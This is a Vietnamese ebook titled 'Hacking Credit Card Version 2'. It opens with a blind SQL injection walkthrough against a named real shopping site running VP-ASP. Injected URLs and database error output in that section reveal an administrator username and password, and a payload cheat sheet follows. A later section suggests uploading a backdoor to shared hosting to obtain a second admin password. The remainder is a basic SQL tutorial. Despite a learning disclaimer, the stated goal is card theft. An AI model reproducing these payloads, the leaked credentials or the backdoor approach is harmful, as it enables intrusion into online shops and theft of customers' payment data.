Ebook Hacking Credit Card Version 2

Trang 1

-+++ -

Ebook Hacking Credit Card Version 2 – Lastest And The End

Hack chỉ là để học hỏi và trao dồi kĩ năng bảo mật.

Title : Credit Card Should Stop

Tutorial đáng chú ý nhất trong Ebook này

Hacking Credit Card – Sql Blind V.1 (Power by Tieuquainho)

Có một bài viết nằm trong Ebook Hacking Credit Card version 1, có cách hack giống cách này nhưng có vẻ đây là bài viết đầy đủ nhất

Xin giới thiệu sơ qua SQL Blind :

• Đây là hình thức khai thác dựa vào lỗ hổng bảo mật của MSSQL, dựa vào lỗ hổng này chúng ta áp dụng những đoạn mã để khai thác và tìm kiếm được thông tin từ Database của Server đó SQL Blind là kiểu khai thác dò tìm từng ký tự, khi các bạn đã sử dụng đa

số các thao thác kỹ thuật hack SQL khác mà không thành công thì có thể tạm nói SQL Blind này có thề khai thông những bế tắc đó, tuy nhiên bên mặt tốt luôn có mặt không tốt

đó là quá trình truy vấn SQL Blind tốn rất nhiều thời gian và công sức bởi vì các bạn phải tìm từng ký tự một trong chuỗi cần tìm VD: tìm link admin thì các bạn phải tìm từng chữ trong chuỗi Database về link admin và ghép chúng lại thành 1 chuỗi Nói nhiều các bạn rối thôi làm liền cho chắc dễ hiểu

Trang 2

Chúng ta bắt đâu hack 1 site demo nha

Mục tiêu là hxxps://circleathletics.com/ (sử dụng VP-ASP V5.0)

- đầu tiên chúng ta tìm link admin của site này

-

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a')

Microsoft VBScript runtime error '800a000d'

Type mismatch: 'clng'

/shop/shopproductfeatures.asp, line 139

Như vậy có nghĩa là từ khóa chúng ta đưa ra (a) không phải là ký tự đâu tiên trong chuỗi link admin, chúng ta chợt suy nghĩ đên link admin thường là shopadmin.asp … thử với câu lênh sau thay chữ a = s

-

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='s')

Microsoft OLE DB Provider for SQL Server error '80040e07'

Syntax error converting the varchar value 'xadminpage' to a column of data type int /shop/shop$db.asp, line 409

- Chính xác là chữ S là ký tự đâu tien của link admin rồi, chúng ta tiếp tục thế những chữ khác và tiếp theo

-

hxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,2)='sh')

- Chú ý chỗ này nha (fieldvalue,2)='sh')

- Cú tiếp tục thay tiếp vào đê tìm ra link admin Link admin kết thúc = asp nên không cần tìm xem chuỗi ký tự có bao nhiêu ký tự đâu

Tiếp theo chúng ta tìm user + pass admin

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='a')

Ko có gì hết tiếp tục như thế

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,1)='c')

Syntax error converting the varchar value 'circ54' to a column of data type int

/shop/shop$db.asp, line 409

Hiện luôn User ra luôn site này bị lỗi nặng nếu những site khác các bạn động não 1 tí như khi tìm link admin là ok hihi

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20f

Trang 3

ldusername%20from%20tbluser%20where%20admintype='super'%20and%20left(fldusername,2)='ab')

đây là cách tìm ký tự thư 2 , thứ 3 thì them vào (fldusername,3)='abc') dậy đó dễ mà Chúng ta đã có user admin ở trên rồi circ54 tìm pass của nó

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldpassword,1)='a')

hxxps://circleathletics.com/shop/shopaddtocart.asp?catalogid=6%20or%201=(select%20fldpassword%20from%20tbluser%20where%20fldusername='circ54'%20and%20left(fldpassword,1)='2')

Syntax error converting the varchar value '2005HCP' to a column of data type int

/shop/shop$db.asp, line 409

Vậy là đã hack được thằng này rồi hihi quá dễ phải không các bạn

Hy vọng các bạn hiểu mình viết vụng lắm mong mọi người thông cảm

Còn đây là 1 số tham khỏa them

*************(*** Ti`m link admin ***************************************

%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a') <=== Doan ki tu dau

%20or%201=(select%20fieldname%20from%20configuration%20where%20left(fieldname,10)='xadminpage'%20and%20left(fieldvalue,1)='a'%20and%20len(fieldvalue)=15)

<=== Tim so ki tu

**************** Ti`m user ***********************************************

%20or 1=(select fldusername from tbluser where admintype='super' and

left(fldusername,1)='a') <== Ki tu dau

%20or 1=(select fldusername from tbluser where admintype='super' and

left(fldusername,2)='ab') <== Tim chu~ thu 2 - thu 3 thi the = so 3 va mo` tiep

%20or 1=(select fldusername from tbluser where left(fldusername,1)='b' and

len(fldusername)=3) <== So ki tu cua user

o%20r 1=(select fldusername from tbluser where left(fldusername,1)='a') When not superAdmin

Trang 4

Hacking Password thứ 2 của shop

( Nghiên cứu của nobita và hieupc )

Bài viết của nobita:

Anh em xem trước code của cái trang login 2 pass:

' Forces user to login

' asked for userid and password

' Goes to shopadmin1.asp

' Version 4.50

' September 7, 2002

'********************************************************************* SetSess "ShopAdmin",""

Trang 5

fldpassword='" & userpassword & "'"

<form action="<%=getconfig("xadminpage")%>" method="post" name="LoginForm">

<center><font face=arial size=2

color="#0080C0"><b><%=LangAdmin02%></b></font></center><br>

<TABLE WIDTH=300 BORDER=1 CELLPADDING=3 CELLSPACING=0

align="center" bordercolordark="#333399" bordercolorlight="#666699">

<TR>

<font face="Arial, Helvetica" SIZE=2

Trang 6

If getconfig("xAllowSupplierlogin")<>"Yes" then exit sub

sql = "select * from suppliers where supplieruserid='" & username & "' and

supplierpassword='" & userpassword & "'"

Set rs = myconn.Execute(SQL)

If err.number>0 then

msg="database Open error<br>" & GetSess("Openerror")

else

If Not rs.EOF Then

setsess "shopadmin" ,request("username")

setsess "admintype","supplier"

setsess "login" , rs("supplieruserid")

setsess("supplierid"),rs("supplierid")

Trang 7

'******************************************************************* Sub CheckSecondPassword(rc)

if password="" then exit sub

if ucase(password)<>ucase(secondpassword) then exit sub

rc=0

end sub

Trang 8

%>

Chú ý chỗ chữ đỏ và xanh, đấy là nơi đặt cái pass thứ 2 của shop VPASP Lúc trước nobita còn có suy luận rằng cái pass 2 này được thằng VPASP fix và nó nằm trong database của shop, nhưng cái này không đúng Từ cách đặt pass 2 thế này, nobita nghĩ rằng việc làm pass 2 này có thể do thằng webmaster nó edit theo hướng dẫn của VPASP Cách đặt pass ở các vị trí có thể khác nhau chẳng hạn:

CODE

<! #include file="shop$db.asp" >

<! #include file="pass2.asp" >

<%

trong đấy file pass2 chứa password thứ 2

hoặc chỉ đường dẫn của password thứ 2 nằm đâu đó trong cái đống database của shop mà info của nó không thay đổi, tạo 1 table riêng chứa pass2 chẳng hạn

Ngoài những cách đặt pass2 cơ bản này thì cách làm cũng đa dạng tùy thuộc vào trình độ của các webmaster

Tuy nhiên trong thời gian vừa qua, có 1 số anh em cho rằng có code để khai thác pass2, nhưng thực chất là dò tìm trong database các table lạ, nhiều khả năng chứa info pass2, ví dụ:

Trang 9

COLUMNS

CONSTRAINT_COLUMN_USAGE CONSTRAINT_TABLE_USAGE DOMAIN_CONSTRAINTS

DOMAINS

KEY_COLUMN_USAGE

REFERENTIAL_CONSTRAINTS

Trang 10

Mong rằng qua bài viết này sẽ giúp anh em tìm kiếm pass2 được tốt hơn

Bài viết của hieupc:

Theo kinh nghiệm của hieupc biết được, muốn hack được password thứ 2 của shop ( Secure Pass) thì chỉ có cách hack local là nhanh và gọn nhất, ngoài cách hack local này bạn có thể dựa theo bài viết kinh nghiệm của nobita để mà lấy được pass 2 Có vẻ việc hack local trở nên rất dễ khi bạn có một host trong tay, và chỉ cần upload 1 con backdoor lên chẳng hạn như con remview.php là có thể hack Tuy nhiên việc này đòi hỏi bạn phải

có kiến thức vững về Hosting và DNS Bạn muốn biết được shop đó nằm ở server nào bạn có thể check DNS hoặc IP để định vị, và từ đó bạn lần theo đó mà đăng kí cho mình

1 host cùng host với shop bạn cần lấy pass 2 Còn việc hack local và check DNS thế nào hay hiểu rõ thêm về host các bạn có thể ghé thăm các trang sau đây để được hướng dẫn

cụ thể: http://viethacker.org , http://hvaonline.net và check DNS, kiểm tra thông tin bạn: http://pavietnam.net , http://checkdomain.com , http://whoisc.com , http://check-dns.com Ngoài ra, còn nhiều trang web khác, bạn có thể lên google.com search

Trang 11

SQL là viết tắt của Structured Query Language - Ngôn ngữ truy vấn cấu trúc

SQL cho phép bạn truy cập vào CSDL

SQL là một chuẩn ngôn ngữ của ANSI

SQL có thể thực thi các câu truy vấn trên CSDL

SQL có thể lấy dữ liệu từ CSDL

SQL có thể chèn dữ liệu mới vào CSDL

SQL có thể xoá dữ liệu trong CSDL

SQL có thể sửa đổi dữ liệu hiện có trong CSDL

SQL dễ học :-)

SQL là một chuẩn

SQL là một chuẩn của ANSI (American National Standards Institute - Viện tiêu chuẩn quốc gia Hoa kỳ) về truy xuất các hệ thống CSDL Các câu lệnh SQL được sử dụng để truy xuất và cập nhật dữ liệu trong một CSDL

SQL hoạt động với hầu hết các chương trình CSDL như MS Access, DB2, Informix, MS SQL Server, Oracle, Sybase v.v

Lưu ý: Hầu hết các chương trình CSDL hỗ trợ SQL đều có phần mở rộng cho SQL chỉ hoạt động với chính chương trình đó

Bảng CSDL

Một CSDL thường bao gồm một hoặc nhiều bảng (table) Mỗi bảng được xác định thông qua một tên (ví dụ Customers hoặc Orders) Bảng chứa các mẩu tin - dòng (record - row),

Trang 12

là dữ liệu của bảng

Dưới đây là một ví dụ về một bảng có tên là Persons (người):

LastName FirstName Address City

Hansen Ola Timoteivn 10 Sandnes

Svendson Tove Borgvn 23 Sandnes

Pettersen Kari Storgt 20 Stavanger

Bảng ở trên bao gồm 3 mẩu tin (dòng), mỗi mẩu tin tương ứng với một người, và bốn cột (LastName, FirstName, Address và City)

Câu truy vấn SQL

Với SQL ta có thể truy vấn CSDL và nhận lấy kết quả trả về thông qua các câu truy vấn

Một câu truy vấn như sau:

SELECT LastName FROM Persons

Sẽ trả về kết quả như sau:

SQL là ngôn ngữ thao tác dữ liệu (DML - Data Manipulation Language)

SQL là cú pháp để thực thi các câu truy vấn SQL cũng bao gồm cú pháp để cập nhật -

Trang 13

sửa đổi, chèn thêm và xoá các mẩu tin

Sau đây là danh sách các lệnh và truy vấn dạng DML của SQL:

SELECT - lấy dữ liệu từ một bảng CSDL

UPDATE - cập nhật/sửa đổi dữ liệu trong bảng

DELETE - xoá dữ liệu trong bảng

INSERT INTO - thêm dữ liệu mới vào bảng

SQL là ngôn ngữ định nghĩa dữ liệu (DDL - Data Definition Language)

Phần DDL của SQL cho phép tạo ra hoặc xoá các bảng Chúng ta cũng có thể định nghĩa các khoá (key), chỉ mục (index), chỉ định các liên kết giữa các bảng và thiết lập các quan

hệ ràng buộc giữa các bảng trong CSDL

Các lệnh DDL quan trọng nhất của SQL là:

CREATE TABLE - tạo ra một bảng mới

ALTER TABLE - thay đổi cấu trúc của bảng

DROP TABLE - xoá một bảng

CREATE INDEX - tạo chỉ mục (khoá để tìm kiếm - search key)

DROP INDEX - xoá chỉ mục đã được tạo

Trang 14

SELECT tên_các_cột

FROM tên_bảng

Truy xuất nhiều cột

Để truy xuất các cột mang tên LastName và FirstName, ta dùng một câu lệnh SELECT như sau:

SELECT LastName, FirstName FROM Persons

Bảng Persons:

Để truy xuất tất cả các cột từ bảng Persons, ta dùng ký hiệu * thay cho danh sách các cột:

SELECT * FROM Persons

Kết quả trả về:

LastName - FirstName- Address -City

Trang 15

Hansen - Ola -Timoteivn 10 - Sandnes

Svendson - Tove -Borgvn 23 - Sandnes

Pettersen -Kari -Storgt 20 -Stavanger

Tập kết quả

Kết quả trả về từ một câu truy vấn SQL được lưu trong 1 tập kết quả (result set) Hầu hết các hệ thống chương trình CSDL cho phép duyệt qua tập kết quả bằng các hàm lập trình như Move-To-First-Record, Get-Record-Content, Move-To-Next-Record v.v

Dấu chẩm phảy (;) phía sau câu lệnh

Dấu chẩm phảy là một cách chuẩn để phân cách các câu lệnh SQL nếu như hệ thống CSDL cho phép nhiều câu lệnh SQL được thực thi thông qua một lời gọi duy nhất

Các câu lệnh SQL trong bài viết này đều là các câu lệnh đơn (mỗi câu lệnh là một và chỉ một lệnh SQL) MS Access và MS SQL Server không đỏi hỏi phải có dấu chấm phảy ngay sau mỗi câu lệnh SQL, nhưng một số chương trình CSDL khác có thể bắt buộc bạn phải thêm dấu chấm phảy sau mỗi câu lệnh SQL (cho dù đó là câu lệnh đơn) Xin nhắc lại, trong bài viết này chúng ta sẽ không dùng dấu chấm phảy ở cuối câu lệnh SQL

-Mệnh đề WHERE

Để truy xuất dữ liệu trong bảng theo các điều kiện nào đó, một mệnh đề WHERE có thể được thêm vào câu lệnh SELECT

Cú pháp

Cú pháp mệnh đề WHERE trong câu lệnh SELECT như sau:

SELECT tên_cột FROM tên_bảng

WHERE tên_cột phép_toán giá_trị

Trong mệnh đề WHERE, các phép toán được sử dụng là

Trang 16

BETWEEN Nằm giữa một khoảng

LIKE So sánh mẫu chuỗi

Lưu ý: Trong một số phiên bản của SQL, phép toán <> có thể được viết dưới dạng !=

Sử dụng mệnh đề WHERE

Để lấy danh sách những người sống ở thành phố Sandnes, ta sử dụng mệnh đề WHERE trong câu lệnh SELECT như sau:

WHERE City = 'Sandnes'

Trang 17

hiển thị một dòng nếu BẤT KỲ điều kiện nào được thoả

Bảng dữ liệu dùng trong ví dụ

Svendson Stephen Kaivn 18 Sandnes

Ví dụ 1

Sử dụng AND để tìm những người có tên là Tove và họ là Svendson:

WHERE FirstName = 'Tove'

AND LastName = 'Svendson'

Ví dụ 2

Sử dụng OR để tìm những người có tên là Tove hoặc họ là Svendson:

WHERE firstname = 'Tove'

OR lastname = 'Svendson'

Trang 18

Ví dụ 3

Bạn cũng có thể sử dụng kết hợp AND và OR cùng với dấu ngoặc đơn để tạo nên các câu truy vấn phức tạp:

SELECT * FROM Persons WHERE

(FirstName = 'Tove' OR FirstName = 'Stephen')

AND LastName = 'Svendson'

Hansen Ola Timoteivn 10 Sandnes 1951

Svendson Tove Borgvn 23 Sandnes 1978

Svendson Stale Kaivn 18 Sandnes 1980

Pettersen Kari Storgt 20 Stavanger 1960

LastName FirstName Address City Year

Hansen Ola Timoteivn 10 Sandnes 1951

Svendson Tove Borgvn 23 Sandnes 1978

Svendson Stale Kaivn 18 Sandnes 1980

Sử dụng dấu nháy

Lưu ý rằng ở ví dụ trên ta đã sử dụng hai dấu nháy đơn (') bao quanh giá trị điều kiện 'Sandnes'

Trang 19

SQL sử dụng dấu nháy đơn bao quanh các giá trị ở dạng chuỗi văn bản (text) Nhiều hệ CSDL còn cho phép sử dụng dấu nháy kép (") Các giá trị ở dạng số không dùng dấu nháy để bao quanh

Với dữ liệu dạng chuỗi văn bản:

SELECT * FROM Persons WHERE Year > '1965'

Phép toán điều kiện LIKE

Phép toán LIKE được dùng để tìm kiếm một chuỗi mẫu văn bản trên một cột

Cú pháp

Cú pháp của phép toán LIKE như sau:

SELECT tên_cột FROM tên_bảng

WHERE tên_cột LIKE mẫu

Một ký hiệu % có thể được sử dụng để định nghĩa các ký tự đại diện % có thể được đặt

Trang 20

trước và/hoặc sau mẫu

Sử dụng LIKE

Câu lệnh SQL sau sẽ trả về danh sách những người có tên bắt đầu bằng chữ O:

WHERE FirstName LIKE 'O%'

Câu lệnh SQL sau sẽ trả về danh sách những người có tên kết thúc bằng chữ a:

WHERE FirstName LIKE '%a'

Câu lệnh SQL sau sẽ trả về danh sách những người có tên kết chứa chuỗi la:

WHERE FirstName LIKE '%la%'

Nordmann Anna Neset 18 Sandnes

Trang 21

Ví dụ 1

Tìm tất cả những người có họ (sắp xếp theo ABC) nằm giữa Hansen (tính luôn Hansen)

và Pettersen (không tính Pettersen):

SELECT * FROM Persons WHERE LastName

BETWEEN 'Hansen' AND 'Pettersen'

Nordmann Anna Neset 18 Sandnes

Lưu ý quan trọng: Toán tử BETWEEN END sẽ trả về những kết quả khác nhau trên các

hệ CSDL khác nhau Với một số hệ CSDL, toán tử BETWEEN END sẽ trả về các dòng

mà có giá trị thực sự "nằm giữa" hai khoảng giá trị (tức là bỏ qua không tính đến các giá trị trùng với giá trị của hai đầu mút) Một số hệ CSDL thì sẽ tính luôn các giá trị trùng với hai đầu mút Trong khi đó một số hệ CSDL khác lại chỉ tính các giá trị trùng với đầu mút thứ nhất mà không tính đầu mút thứ hai (như ở ví dụ phía trên) Do vậy, bạn phải kiểm tra lại hệ CSDL mà bạn đang dùng khi sử dụng toán tử BETWEEN AND

Ví dụ 2

Để tìm những người có họ (sắp xếp theo ABC) nằm ngoài khoảng hai giá trị ở ví dụ 1, ta dùng thêm toán tử NOT:

SELECT * FROM Persons WHERE LastName

NOT BETWEEN 'Hansen' AND 'Pettersen'

Trang 22

-

Từ khoá DISTINCT

Câu lệnh SELECT sẽ trả về thông tin về các cột trong bảng Nhưng nếu chúng ta không muốn lấy về các giá trị trùng nhau thì sau?

Với SQL, ta chỉ cần thêm từ khoá DISTINCT vào câu lệnh SELECT theo cú pháp sau:

SELECT DISTINCT tên_cột FROM tên_bảng

Trang 24

Để lấy danh sách các công ty theo thứ tự chữ cái (tăng dần):

SELECT Company, OrderNumber FROM Orders

ORDER BY Company, OrderNumber

Trang 25

Lấy danh sách các công ty theo thứ tự giảm dần:

SELECT Company, OrderNumber FROM Orders

ORDER BY Company DESC

Câu lệnh INSERT INTO

Câu lệnh INSERT INTO được dùng để chèn dòng mới vào bảng

Cú pháp:

INSERT INTO tên_bảng

VALUES (giá_trị_1, giá_trị_2, )

Bạn cũng có thể chỉ rõ các cột/trường nào cần chèn dữ liệu:

INSERT INTO tên_bảng (cột_1, cột_2, )

VALUES (giá_trị_1, giá_trị_2, )

Trang 26

Chèn 1 dòng mới

Ta có bảng Persons như sau:

Câu lệnh SQL sau:

INSERT INTO Persons

VALUES ('Hetland', 'Camilla', 'Hagabakka 24', 'Sandnes')

sẽ tạora kết quả trong bảng Persons như sau:

Hetland Camilla Hagabakka 24 Stavanger

Chèn dữ liệu vào các cột/trường cụ thể

Với bảng Persons như trên, câu lệnh SQL sau:

INSERT INTO Persons (LastName, Address)

VALUES ('Rasmussen', 'Storgt 67')

Sẽ tạo ra kết quả:

Hetland Camilla Hagabakka 24 Stavanger

Rasmussen Storgt 67

Trang 27

SET tên_cột = giá_trị_mới

WHERE tên_cột = giá_trị

Ví dụ: bảng Person của ta như sau:

Nilsen Fred Kirkegt 56 Stavanger

Rasmussen Storgt 67

Cập nhật 1 cột trên 1 dòng

Giả sử ta muốn bổ xung thêm phần tên cho người có họ là Rasmussen:

UPDATE Person SET FirstName = 'Nina'

WHERE LastName = 'Rasmussen'

Ta sẽ có kết quả như sau:

Rasmussen Nina Storgt 67

Cập nhật nhiều cột trên 1 dòng

Bây giờ ta lại muốn đổi tên và địa chỉ:

Trang 28

UPDATE Person

SET Address = 'Stien 12', City = 'Stavanger'

WHERE LastName = 'Rasmussen'

Kết quả sẽ là:

Rasmussen Nina Stien 12 Stavanger

-

Câu lệnh DELETE

được dùng để xoá các dòng ra khỏi bảng

Cú pháp:

DELETE FROM tên_bảng

WHERE tên_cột = giá_trị

Ví dụ: Bảng Person của ta như sau:

Rasmussen Nina Stien 12 Stavanger

Xoá 1 dòng:

Ta xoá người có tên là Nina Rasmussen:

DELETE FROM Person WHERE LastName = 'Rasmussen'

Trang 29

Kết quả sau khi xoá:

Xoá tất cả các dòng:

Đôi khi ta muốn xoá tất cả dữ liệu trong bảng nhưng vẫn giữ lại bảng cùng với cấu trúc

và tất cả các thuộc tính của bảng, ta có thể dùng câu lệnh:

DELETE FROM table_name

Hàm COUNT(*) trả về số lượng các dòng được chọn ở trong bảng

Ví dụ ta có bảng Persons như sau:

Name Age

Hansen, Ola 34

Svendson, Tove 45

Pettersen, Kari 19

Trang 30

Câu lệnh sau sẽ trả về số lượng các dòng trong bảng:

SELECT COUNT(*) FROM Persons

và kết quả trả về sẽ là:

3

Câu lệnh sau sẽ trả về số lượng những người lớn hơn 20 tuổi:

SELECT COUNT(*) FROM Persons WHERE Age > 20

Câu lệnh sau sẽ trả về số lượng những người mà cột Age trong bảng không rỗng:

SELECT COUNT(Age) FROM Persons

và kết quả trả về sẽ là:

Định dạng
Số trang	61
Dung lượng	326,15 KB